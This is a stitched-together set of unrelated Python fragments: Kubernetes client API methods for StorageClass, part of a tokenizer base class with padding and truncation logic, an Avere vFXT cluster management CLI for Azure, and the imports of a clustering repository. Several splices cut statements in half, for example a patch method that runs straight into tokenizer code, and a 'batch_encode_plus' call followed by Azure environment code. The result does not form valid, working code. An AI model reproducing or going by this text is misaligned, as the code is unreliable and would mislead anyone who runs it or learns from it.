files=local_var_files,
response_type='UnversionedAPIResourceList',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def list_storage_v1beta1_storage_class(self, **kwargs):
"""
list or watch objects of kind StorageClass
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_storage_v1beta1_storage_class(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str pretty: If 'true', then the output is pretty printed.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1beta1StorageClassList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_storage_v1beta1_storage_class_with_http_info(**kwargs)
else:
(data) = self.list_storage_v1beta1_storage_class_with_http_info(**kwargs)
return data
def list_storage_v1beta1_storage_class_with_http_info(self, **kwargs):
"""
list or watch objects of kind StorageClass
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_storage_v1beta1_storage_class_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str pretty: If 'true', then the output is pretty printed.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1beta1StorageClassList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['pretty', 'field_selector', 'label_selector', 'resource_version', 'timeout_seconds', 'watch']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_storage_v1beta1_storage_class" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/apis/storage.k8s.io/v1beta1/storageclasses'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'field_selector' in params:
query_params['fieldSelector'] = params['field_selector']
if 'label_selector' in params:
query_params['labelSelector'] = params['label_selector']
if 'resource_version' in params:
query_params['resourceVersion'] = params['resource_version']
if 'timeout_seconds' in params:
query_params['timeoutSeconds'] = params['timeout_seconds']
if 'watch' in params:
query_params['watch'] = params['watch']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1beta1StorageClassList',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def patch_storage_v1beta1_storage_class(self, name, body, **kwargs):
"""
partially update the specified StorageClass
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.patch_storage_v1beta1_storage_class(name, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the StorageClass (required)
:param UnversionedPatch body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1beta1StorageClass
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.patch_storage_v1beta1_storage_class_with_http_info(name, body, **kwargs)
else:
(data) = self.patch_storage_v1beta1_storage_class_with_http_info(name, body, **kwargs)
return data
def patch_storage_v1beta1_storage_class_with_http_info(self, name, body, **kwargs):
"""
partially update the specified StorageClass
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.patch_storage_v1beta1_storage_class_with_http_info(name, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the StorageClass (required)
:param UnversionedPatch body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1beta1StorageClass
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'body', 'pretty']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_storage_v1beta1_storage_class" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `patch_storage_v1beta1_storage_class`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `patch_storage_v1beta1_storage_class`")
collection_formats = {}
resource_path = '/apis/storage.k8s.io/v1beta1/storageclasses/{name}'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json-patch+json', 'application/merge-patch+json', 'application/strategic-merge-patch+json'])
not None and isinstance(model_max_length, (int, float)):
init_kwargs["model_max_length"] = min(init_kwargs.get("model_max_length", int(1e30)), model_max_length)
# Merge resolved_vocab_files arguments in init_kwargs.
added_tokens_file = resolved_vocab_files.pop("added_tokens_file", None)
for args_name, file_path in resolved_vocab_files.items():
if args_name not in init_kwargs:
init_kwargs[args_name] = file_path
# Instantiate tokenizer.
try:
tokenizer = cls(*init_inputs, **init_kwargs)
except OSError:
raise OSError(
"Unable to load vocabulary from file. "
"Please check that the provided vocabulary is accessible and not corrupted."
)
# Save inputs and kwargs for saving and re-loading with ``save_pretrained``
tokenizer.init_inputs = init_inputs
tokenizer.init_kwargs = init_kwargs
# If there is a complementary special token map, load it
special_tokens_map_file = resolved_vocab_files.pop("special_tokens_map_file", None)
if special_tokens_map_file is not None:
with open(special_tokens_map_file, encoding="utf-8") as special_tokens_map_handle:
special_tokens_map = json.load(special_tokens_map_handle)
for key, value in special_tokens_map.items():
if isinstance(value, dict):
value = AddedToken(**value)
elif isinstance(value, list):
value = [AddedToken(**token) if isinstance(token, dict) else token for token in value]
setattr(tokenizer, key, value)
# Add supplementary tokens.
special_tokens = tokenizer.all_special_tokens
if added_tokens_file is not None:
with open(added_tokens_file, encoding="utf-8") as added_tokens_handle:
added_tok_encoder = json.load(added_tokens_handle)
# Sort added tokens by index
added_tok_encoder_sorted = list(sorted(added_tok_encoder.items(), key=lambda x: x[1]))
for token, index in added_tok_encoder_sorted:
assert index == len(tokenizer), (
f"Non-consecutive added token '{token}' found. "
f"Should have index {len(tokenizer)} but has index {index} in saved vocabulary."
)
tokenizer.add_tokens(token, special_tokens=bool(token in special_tokens))
# Check all our special tokens are registered as "no split" token (we don't cut them) and are in the vocab
added_tokens = tokenizer.sanitize_special_tokens()
if added_tokens:
logger.warning(
"Special tokens have been added in the vocabulary, make sure the associated word embedding are fine-tuned or trained."
)
return tokenizer
def save_pretrained(self, save_directory: str) -> Tuple[str]:
if os.path.isfile(save_directory):
logger.error("Provided path ({}) should be a directory, not a file".format(save_directory))
return
os.makedirs(save_directory, exist_ok=True)
special_tokens_map_file = os.path.join(save_directory, SPECIAL_TOKENS_MAP_FILE)
added_tokens_file = os.path.join(save_directory, ADDED_TOKENS_FILE)
tokenizer_config_file = os.path.join(save_directory, TOKENIZER_CONFIG_FILE)
tokenizer_config = copy.deepcopy(self.init_kwargs)
if len(self.init_inputs) > 0:
tokenizer_config["init_inputs"] = copy.deepcopy(self.init_inputs)
for file_id in self.vocab_files_names.keys():
tokenizer_config.pop(file_id, None)
with open(tokenizer_config_file, "w", encoding="utf-8") as f:
f.write(json.dumps(tokenizer_config, ensure_ascii=False))
vocab_files = self.save_vocabulary(save_directory)
return vocab_files + (special_tokens_map_file, added_tokens_file)
def encode(
self,
text: Union[TextInput, PreTokenizedInput, EncodedInput],
text_pair: Optional[Union[TextInput, PreTokenizedInput, EncodedInput]] = None,
add_special_tokens: bool = True,
padding: Union[bool, str, PaddingStrategy] = False,
truncation: Union[bool, str, TruncationStrategy] = False,
max_length: Optional[int] = None,
stride: int = 0,
return_tensors: Optional[Union[str, TensorType]] = None,
**kwargs
) -> List[int]:
encoded_inputs = self.encode_plus(
text,
text_pair=text_pair,
add_special_tokens=add_special_tokens,
padding=padding,
truncation=truncation,
max_length=max_length,
stride=stride,
return_tensors=return_tensors,
**kwargs,
)
return encoded_inputs["input_ids"]
def num_special_tokens_to_add(self, pair: bool = False) -> int:
raise NotImplementedError
def _get_padding_truncation_strategies(
self, padding=False, truncation=False, max_length=None, pad_to_multiple_of=None, verbose=True, **kwargs
):
"""
Find the correct padding/truncation strategy with backward compatibility
for old arguments (truncation_strategy and pad_to_max_length) and behaviors.
"""
old_truncation_strategy = kwargs.pop("truncation_strategy", "do_not_truncate")
old_pad_to_max_length = kwargs.pop("pad_to_max_length", False)
# Backward compatibility for previous behavior, maybe we should deprecate it:
# If you only set max_length, it activates truncation for max_length
if max_length is not None and padding is False and truncation is False:
if verbose:
logger.warning(
"Truncation was not explicitely activated but `max_length` is provided a specific value, "
"please use `truncation=True` to explicitely truncate examples to max length. "
"Defaulting to 'longest_first' truncation strategy. "
"If you encode pairs of sequences (GLUE-style) with the tokenizer you can select this strategy "
"more precisely by providing a specific strategy to `truncation`."
)
truncation = "longest_first"
# Get padding strategy
if padding is False and old_pad_to_max_length:
if verbose:
warnings.warn(
"The `pad_to_max_length` argument is deprecated and will be removed in a future version, "
"use `padding=True` or `padding='longest'` to pad to the longest sequence in the batch, or "
"use `padding='max_length'` to pad to a max length. In this case, you can give a specific "
"length with `max_length` (e.g. `max_length=45`) or leave max_length to None to pad to the "
"maximal input size of the model (e.g. 512 for Bert).",
FutureWarning,
)
if max_length is None:
padding_strategy = PaddingStrategy.LONGEST
else:
padding_strategy = PaddingStrategy.MAX_LENGTH
elif padding is not False:
if padding is True:
padding_strategy = PaddingStrategy.LONGEST # Default to pad to the longest sequence in the batch
elif not isinstance(padding, PaddingStrategy):
padding_strategy = PaddingStrategy(padding)
else:
padding_strategy = PaddingStrategy.DO_NOT_PAD
# Get truncation strategy
if truncation is False and old_truncation_strategy != "do_not_truncate":
if verbose:
warnings.warn(
"The `truncation_strategy` argument is deprecated and will be removed in a future version, "
"use `truncation=True` to truncate examples to a max length. You can give a specific "
"length with `max_length` (e.g. `max_length=45`) or leave max_length to None to truncate to the "
"maximal input size of the model (e.g. 512 for Bert). "
" If you have pairs of inputs, you can give a specific truncation strategy selected among "
"`truncation='only_first'` (will only truncate the first sentence in the pairs) "
"`truncation='only_second'` (will only truncate the second sentence in the pairs) "
"or `truncation='longest_first'` (will iteratively remove tokens from the longest sentence in the pairs).",
FutureWarning,
)
truncation_strategy = TruncationStrategy(old_truncation_strategy)
elif truncation is not False:
if truncation is True:
truncation_strategy = (
TruncationStrategy.LONGEST_FIRST
) # Default to truncate the longest sequences in pairs of inputs
elif not isinstance(truncation, TruncationStrategy):
truncation_strategy = TruncationStrategy(truncation)
else:
truncation_strategy = TruncationStrategy.DO_NOT_TRUNCATE
# Set max length if needed
if max_length is None:
if padding_strategy == PaddingStrategy.MAX_LENGTH:
if self.model_max_length > LARGE_INTEGER:
if verbose:
logger.warning(
"Asking to pad to max_length but no maximum length is provided and the model has no predefined maximum length. "
"Default to no padding."
)
padding_strategy = PaddingStrategy.DO_NOT_PAD
else:
max_length = self.model_max_length
if truncation_strategy != TruncationStrategy.DO_NOT_TRUNCATE:
if self.model_max_length > LARGE_INTEGER:
if verbose:
logger.warning(
"Asking to truncate to max_length but no maximum length is provided and the model has no predefined maximum length. "
"Default to no truncation."
)
truncation_strategy = TruncationStrategy.DO_NOT_TRUNCATE
else:
max_length = self.model_max_length
# Test if we have a padding token
if padding_strategy != PaddingStrategy.DO_NOT_PAD and (not self.pad_token or self.pad_token_id < 0):
raise ValueError(
"Asking to pad but the tokenizer does not have a padding token. "
"Please select a token to use as `pad_token` `(tokenizer.pad_token = tokenizer.eos_token e.g.)` "
"or add a new pad token via `tokenizer.add_special_tokens({'pad_token': '[PAD]'})`."
)
# Check that we will truncate to a multiple of pad_to_multiple_of if both are provided
if (
truncation_strategy != TruncationStrategy.DO_NOT_TRUNCATE
and padding_strategy != PaddingStrategy.DO_NOT_PAD
and pad_to_multiple_of is not None
and max_length is not None
and (max_length % pad_to_multiple_of != 0)
):
raise ValueError(
f"Truncation and padding are both activated but "
f"truncation length ({max_length}) is not a multiple of pad_to_multiple_of ({pad_to_multiple_of})."
)
return padding_strategy, truncation_strategy, max_length, kwargs
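# A minimal illustrative sketch (not part of the original class) of how the
# resolution above typically plays out; `tok` is a hypothetical tokenizer
# instance and the enum values assume the PaddingStrategy / TruncationStrategy
# definitions imported by this module:
#
#   >>> tok._get_padding_truncation_strategies(padding=True, truncation=True, max_length=128)
#   (PaddingStrategy.LONGEST, TruncationStrategy.LONGEST_FIRST, 128, {})
#   >>> tok._get_padding_truncation_strategies(max_length=64)  # legacy path: warns, then truncates
#   (PaddingStrategy.DO_NOT_PAD, TruncationStrategy.LONGEST_FIRST, 64, {})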
def __call__(
self,
text: Union[TextInput, PreTokenizedInput, List[TextInput], List[PreTokenizedInput]],
text_pair: Optional[Union[TextInput, PreTokenizedInput, List[TextInput], List[PreTokenizedInput]]] = None,
add_special_tokens: bool = True,
padding: Union[bool, str, PaddingStrategy] = False,
truncation: Union[bool, str, TruncationStrategy] = False,
max_length: Optional[int] = None,
stride: int = 0,
is_split_into_words: bool = False,
pad_to_multiple_of: Optional[int] = None,
return_tensors: Optional[Union[str, TensorType]] = None,
return_token_type_ids: Optional[bool] = None,
return_attention_mask: Optional[bool] = None,
return_overflowing_tokens: bool = False,
return_special_tokens_mask: bool = False,
return_offsets_mapping: bool = False,
return_length: bool = False,
verbose: bool = True,
**kwargs
) -> BatchEncoding:
# Input type checking for clearer error
assert isinstance(text, str) or (
isinstance(text, (list, tuple))
and (
len(text) == 0
or (
isinstance(text[0], str)
or (isinstance(text[0], (list, tuple)) and (len(text[0]) == 0 or isinstance(text[0][0], str)))
)
)
), (
"text input must of type `str` (single example), `List[str]` (batch or single pretokenized example) "
"or `List[List[str]]` (batch of pretokenized examples)."
)
assert (
text_pair is None
or isinstance(text_pair, str)
or (
isinstance(text_pair, (list, tuple))
and (
len(text_pair) == 0
or (
isinstance(text_pair[0], str)
or (
isinstance(text_pair[0], (list, tuple))
and (len(text_pair[0]) == 0 or isinstance(text_pair[0][0], str))
)
)
)
)
), (
"text_pair input must of type `str` (single example), `List[str]` (batch or single pretokenized example) "
"or `List[List[str]]` (batch of pretokenized examples)."
)
is_batched = bool(
(not is_split_into_words and isinstance(text, (list, tuple)))
or (
is_split_into_words and isinstance(text, (list, tuple)) and text and isinstance(text[0], (list, tuple))
)
)
if is_batched:
batch_text_or_text_pairs = list(zip(text, text_pair)) if text_pair is not None else text
return self.batch_encode_plus(
Service.AZURE_ENVIRONMENTS['AzureUSGovernment']['endpoint']
args.azure_storage_suffix = Service.AZURE_ENVIRONMENTS['AzureUSGovernment']['storage_suffix']
if args.azure_environment == 'china':
args.azure_endpoint_base_url = Service.AZURE_ENVIRONMENTS['AzureChinaCloud']['endpoint']
args.azure_storage_suffix = Service.AZURE_ENVIRONMENTS['AzureChinaCloud']['storage_suffix']
if args.azure_environment == 'germany':
args.azure_endpoint_base_url = Service.AZURE_ENVIRONMENTS['AzureGermanCloud']['endpoint']
args.azure_storage_suffix = Service.AZURE_ENVIRONMENTS['AzureGermanCloud']['storage_suffix']
if args.on_instance:
service = Service.on_instance_init(
proxy_uri=args.proxy_uri,
subscription_id=args.subscription_id,
application_id=args.application_id,
application_secret=args.application_secret,
tenant_id=args.tenant_id,
resource_group=args.resource_group,
network_resource_group=args.network_resource_group,
storage_resource_group=args.storage_resource_group,
network=args.azure_network, subnet=args.azure_subnet,
no_connection_test=args.skip_check,
skip_load_defaults=args.skip_load_defaults,
endpoint_base_url=args.azure_endpoint_base_url,
storage_suffix=args.azure_storage_suffix,
storage_account=args.storage_account,
private_range=args.cluster_range,
)
else:
if args.from_environment:
if not all([args.resource_group, args.location, args.azure_network, args.azure_subnet]):
logger.error("Arguments azure-network, azure-subnet, location, and resource_group are required with environment")
parser.exit(1)
else:
if not all([args.application_id, args.application_secret, args.tenant_id]):
logger.error("Arguments tenant-id, application-id, and application-secret are required")
parser.exit(1)
if not args.subscription_id:
subscriptions = Service._list_subscriptions(
application_id=args.application_id,
application_secret=args.application_secret,
tenant_id=args.tenant_id)
args.subscription_id = subscriptions[0]['subscriptionId']
if not all([args.subscription_id, args.azure_network, args.azure_subnet, args.resource_group, args.location]):
logger.error("Arguments subscription-id, azure-network, azure-subnet, resource-group, and location are required")
parser.exit(1)
opts = {
'subscription_id': args.subscription_id,
'application_id': args.application_id,
'application_secret': args.application_secret,
'tenant_id': args.tenant_id,
'resource_group': args.resource_group,
'network_resource_group': args.network_resource_group,
'storage_account': args.storage_account,
'storage_resource_group': args.storage_resource_group,
'location': args.location,
'network': args.azure_network,
'subnet': args.azure_subnet,
'zone': args.azure_zones,
'proxy_uri': args.proxy_uri,
'private_range': args.cluster_range,
'no_connection_test': args.skip_check,
'skip_load_defaults': args.skip_load_defaults,
'endpoint_base_url': args.azure_endpoint_base_url,
'storage_suffix': args.azure_storage_suffix,
}
if args.from_environment:
service = Service.environment_init(**opts)
else:
service = Service(**opts)
service._get_user_shelveable = _get_user_shelveable_azure
if args.ssh_key:
try:
with open(args.ssh_key) as f:
ssh_key_data = f.read()
if 'rsa' not in ssh_key_data:
raise Exception("The SSH key must be of type RSA")
args.ssh_key = ssh_key_data
except Exception as e:
logger.error("Failed to read SSH key: {}".format(e))
parser.exit(1)
if args.create and (not (args.no_corefiler or args.nfs_mount) and not args.storage_account):
logger.error("You must specify a storage account for cloud corefilers")
parser.exit(1)
if args.add_nodes:
if args.nodes > 3:
logger.error("Adding more than 3 cluster nodes is not supported")
parser.exit(1)
# off for Azure unless requested
args.disable_bucket_encryption = True
if args.enable_bucket_encryption:
args.disable_bucket_encryption = False
if args.ultra_ssd:
args.data_disk_type = 'UltraSSD_LRS'
if args.azure_tag:
args.azure_tag = {n.split(':')[0]: (n.split(':')[1] or '') for n in args.azure_tag if len(n.split(':')) > 1}
# generic service options
service.POLLTIME = args.poll_time
if args.node_cache_size:
if any([args.data_disk_count, args.data_disk_size]):
logger.warning("Overriding --data-disk-count and --data-disk-size with --node-cache-size")
disk_config = service._cache_to_disk_config(args.node_cache_size, disk_type=args.data_disk_type, machine_type=args.instance_type)
args.data_disk_count = disk_config[0]
args.data_disk_size = disk_config[1]
logger.debug("Cache size {} specified, setting disk count and size to {}, {}".format(args.node_cache_size, args.data_disk_count, args.data_disk_size))
if args.create:
# run a service check first
try:
if not args.skip_check:
service.check()
except Exception as e:
if args.debug:
logger.exception(e)
logger.error(e)
parser.exit(1)
if not args.no_corefiler:
if not args.disable_bucket_encryption and not args.core_filer_key_file:
err_msg = 'Container/bucket encryption has been specified but a corefiler key file path was not supplied. To use container/bucket encryption you need to also specify a file path using --core-filer-key-file into which the generated key will be saved.'
logger.error(err_msg)
parser.exit(1)
# minimum args for create
if not all([args.instance_type, args.cluster_name, args.admin_password]):
logger.error("Arguments instance-type, cluster-name, and admin-password are required")
parser.exit(1)
if args.nodes and args.nodes < 3: # we default below if nothing was specified
logger.error("Cluster sizes below 3 are not supported")
parser.exit(1)
if args.nodes and args.nodes > 24:
logger.error("Cluster sizes above 24 are not supported")
parser.exit(1)
# cluster create options
options = {
'size': args.nodes or 3,
'data_disk_count': args.data_disk_count,
'data_disk_size': args.data_disk_size,
'data_disk_type': args.data_disk_type,
'data_disk_iops': args.data_disk_iops,
'data_disk_mbps': args.data_disk_mbps,
'root_image': args.image_id,
'root_size': args.root_size,
'iamrole': args.iam_role,
'placement_group': args.placement_group,
'dedicated_tenancy': args.dedicated_tenancy,
'wait_for_state': args.wait_for_state,
'wait_for_state_duration': args.wait_for_state_duration,
'security_group_ids': args.security_group,
'network_security_group': args.network_security_group,
'config_expiration': args.configuration_expiration,
'tags': args.aws_tag or args.gce_tag or args.azure_tag,
'labels': args.labels,
'metadata': args.metadata,
'skip_cleanup': args.skip_cleanup,
'skip_node_renaming': args.skip_node_renaming,
'proxy_uri': args.cluster_proxy_uri,
'disk_encryption': not args.no_disk_encryption,
'ebs_optimized': None if not args.no_ebs_optimized else not args.no_ebs_optimized, # use machine defaults
'auto_public_address': args.public_address,
'management_address': args.management_address,
'address_range_start': args.cluster_address_range_start,
'address_range_end': args.cluster_address_range_end,
'address_range_netmask': args.cluster_address_range_netmask,
'instance_addresses': args.instance_addresses or args.azure_instance_addresses,
'trace_level': args.trace_level,
'timezone': args.timezone,
'admin_ssh_data': args.ssh_key, # azure ssh key
'azure_role': args.azure_role,
'azure_identity': args.azure_identity,
'key_name': args.ssh_key, # aws ssh key
'join_wait': args.join_wait or None,
'service_account': args.service_account,
'scopes': args.scopes,
'enable_boot_diagnostics': args.enable_boot_diagnostics,
'root_disk_caching': args.root_disk_caching,
'data_disk_caching': args.data_disk_caching,
}
# prune out unfortunate command line defaults
options = {k: v for k, v in viewitems(options) if v is not None and v != ''}
logger.info("Creating {} cluster {}".format(args.instance_type, args.cluster_name))
try:
cluster = Cluster.create(service, args.instance_type, args.cluster_name, args.admin_password, **options)
except Exception as e:
if args.debug:
logger.exception(e)
logger.error(e)
logger.error("Failed to create cluster")
parser.exit(1)
corefiler_name = None
if not args.no_corefiler:
try:
if args.nfs_mount:
corefiler_name = _add_nfs_corefiler(cluster, logger, args)
else:
corefiler_name = _add_bucket_corefiler(cluster, logger, args)
except (KeyboardInterrupt, Exception) as e:
if args.debug:
logger.exception(e)
logger.error(e)
if not args.skip_cleanup:
cluster.destroy(quick_destroy=True)
logger.error("Failed to configure core filer")
parser.exit(1)
if not args.no_vserver:
try:
logger.info("Creating vserver {}".format(args.vserver))
vserver_opts = {
'netmask': args.vserver_address_range_netmask,
'start_address': args.vserver_address_range_start,
'end_address': args.vserver_address_range_end,
'home_addresses': args.vserver_home_addresses,
}
cluster.add_vserver(args.vserver, **vserver_opts)
if corefiler_name:
logger.info("Creating vserver junction {}".format(corefiler_name))
junction_opts = {
'path': args.junction
}
if args.nfs_mount:
mount = args.nfs_mount.split(':')[-1]
junction_opts['path'] = args.junction or '/{}'.format(corefiler_name)
junction_opts['export'] = mount
junction_opts['subdir'] = args.subdir
cluster.add_vserver_junction(args.vserver, corefiler_name, **junction_opts)
except (KeyboardInterrupt, Exception) as e:
if args.debug:
logger.exception(e)
logger.error(e)
if not args.skip_cleanup:
cluster.destroy(quick_destroy=True)
logger.error("Failed to configure vserver")
parser.exit(1)
cluster_version = cluster.xmlrpc().cluster.get()['activeImage']
logger.info("{} version {}".format(cluster.name, cluster_version))
logger.info("{} management address: {}".format(cluster.name, cluster.mgmt_ip))
logger.info("{} nodes: {}".format(cluster.name, ' '.join([n.id() for n in cluster.nodes])))
logger.info("Complete")
elif args.start:
cluster = _get_cluster(service, logger, args)
if not cluster or not cluster.nodes:
logger.error("Cluster not found.")
parser.exit(1)
if cluster.is_on():
logger.error("Cluster is already running.")
parser.exit(1)
node_names = ', '.join([i.name() for i in cluster.nodes])
logger.info("Starting cluster with nodes {}".format(node_names))
try:
cluster.start()
except Exception as e:
if args.debug:
logger.exception(e)
logger.error("Failed to start cluster: {}".format(e))
parser.exit(1)
if all([args.management_address, args.admin_password]):
cluster.mgmt_ip = args.management_address
cluster.admin_password = args.admin_password
if args.wait_for_state:
cluster.wait_for_healthcheck(state=args.wait_for_state, conn_retries=20, duration=args.wait_for_state_duration)
logger.info("Complete")
elif args.stop:
cluster = _get_cluster(service, logger, args)
if not cluster or not cluster.nodes:
logger.error("Cluster not found.")
parser.exit(1)
if cluster.is_off():
logger.error("Cluster is already stopped.")
parser.exit(1)
node_names = ', '.join([i.name() for i in cluster.nodes])
logger.info("Stopping cluster with nodes {}".format(node_names))
try:
cluster.stop()
except Exception as e:
if args.debug:
logger.exception(e)
logger.error("Failed to stop cluster: {}".format(e))
parser.exit(1)
logger.info("Complete")
elif args.destroy:
# minimum args for destroy
if not all([args.management_address, args.admin_password]):
logger.error("Arguments management-address and admin-password are required")
parser.exit(1)
cluster = _get_cluster(service, logger, args)
if not cluster:
logger.error("Cluster not found.")
parser.exit(1)
node_names = ', '.join([i.name() for i in cluster.nodes])
logger.info("Destroying cluster with nodes {}".format(node_names))
try:
cluster.destroy(quick_destroy=args.quick_destroy)
except Exception as e:
if args.debug:
logger.exception(e)
logger.error("Failed to destroy cluster: {}".format(e))
parser.exit(1)
logger.info("Complete")
elif args.shelve:
cluster = _get_cluster(service, logger, args)
if not cluster or not cluster.nodes:
logger.error("Cluster not found.")
parser.exit(1)
if cluster.is_shelved():
logger.error("Nodes are already shelved.")
parser.exit(1)
node_names = ' '.join([i.id() for i in cluster.nodes])
logger.info("Shelving nodes {}".format(node_names))
cluster.shelve()
logger.info("Completed shelving nodes {}".format(node_names))
elif args.unshelve:
cluster = _get_cluster(service, logger, args)
if not cluster or not cluster.nodes:
logger.error("Cluster not found.")
parser.exit(1)
if not cluster.is_shelved():
logger.error("Nodes are not shelved.")
parser.exit(1)
node_names = ' '.join([i.name() for i in cluster.nodes])
logger.info("Unshelving nodes {}".format(node_names))
try:
cluster.unshelve(count_override=args.data_disk_count, size_override=args.data_disk_size, type_override=args.data_disk_type, kms_key_id=args.kms_key_id)
except Exception as e:
logger.exception(e)
cluster.refresh()
if not cluster.is_on():
cluster.shelve()
logger.error("Failed to unshelve cluster")
parser.exit(1)
# if a real cluster, we can run healthcheck
if all([args.management_address, args.admin_password]) and not args.instances:
cluster.mgmt_ip = args.management_address
cluster.admin_password = args.admin_password
if args.wait_for_state:
cluster.wait_for_healthcheck(state=args.wait_for_state, conn_retries=20, duration=args.wait_for_state_duration)
logger.info("Completed unshelving nodes {}".format(node_names))
elif args.add_nodes:
if not all([args.nodes, args.management_address, args.admin_password]):
logger.error("Arguments nodes, management-address, and admin-password are required")
parser.exit(1)
cluster = _get_cluster(service, logger, args)
if not cluster:
logger.error("Cluster not found.")
parser.exit(1)
if args.nodes + len(cluster.nodes) > 24:
logger.error("Cluster sizes above 24 are not supported")
parser.exit(1)
options = {
'root_image': args.image_id,
'root_size': args.root_size,
'data_disk_count': args.data_disk_count,
'data_disk_size': args.data_disk_size,
'data_disk_type': args.data_disk_type,
'data_disk_iops': args.data_disk_iops,
'data_disk_mbps': args.data_disk_mbps,
'tags': args.aws_tag or args.gce_tag or args.azure_tag,
'metadata': args.metadata,
'skip_cleanup': args.skip_cleanup,
'skip_node_renaming': args.skip_node_renaming,
'machine_type': args.instance_type,
'auto_public_address': args.public_address,
'join_wait': args.join_wait or None,
'service_account': args.service_account,
'home_addresses': args.vserver_home_addresses,
'key_name': args.ssh_key, # aws ssh key
'admin_ssh_data': args.ssh_key, # azure ssh key
'instance_addresses': args.instance_addresses,
'azure_role': args.azure_role,
'azure_identity': args.azure_identity,
'zone': args.zone or args.azure_zones,
}
# prune out unfortunate command line defaults
options = {k: v for k, v in viewitems(options) if v is not None and v != ''}
try:
count = args.nodes or 1
logger.info("Adding {} node(s) to {}.".format(count, cluster.name))
cluster.add_nodes(count, **options)
except Exception as e:
if args.debug:
logger.exception(e)
logger.error("Failed to add nodes to cluster: {}".format(e))
parser.exit(1)
logger.info("Rebalancing directory managers")
try:
cluster.rebalance_directory_managers()
except vFXTStatusFailure as e:
logger.error(e)
if 'A directory manager rebalance operation is already scheduled' in str(e):
parser.exit(1)
if args.wait_for_state:
cluster.wait_for_healthcheck(state=args.wait_for_state, duration=args.wait_for_state_duration)
logger.info("Complete")
elif args.interact:
from vFXT.serviceInstance import ServiceInstance # handy import #pylint: disable=unused-variable,possibly-unused-variable
local = globals()
local.update(locals())
banner = "\n--- Service object available as 'service' ---\n"
try:
from IPython import start_ipython
logger.info(banner)
start_ipython(argv=['--classic', '--no-banner'], user_ns=local)
except ImportError:
from code import interact
interact(local=local, banner=banner)
elif args.upgrade_alternate_image:
if not args.upgrade_url:
logger.error("Provide a | |
# Repository: darylperalta/DTC
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn.parameter import Parameter
from torch.optim import SGD
from torch.autograd import Variable
from sklearn.metrics.cluster import normalized_mutual_info_score as nmi_score
from sklearn.metrics import adjusted_rand_score as ari_score
from sklearn.cluster import KMeans
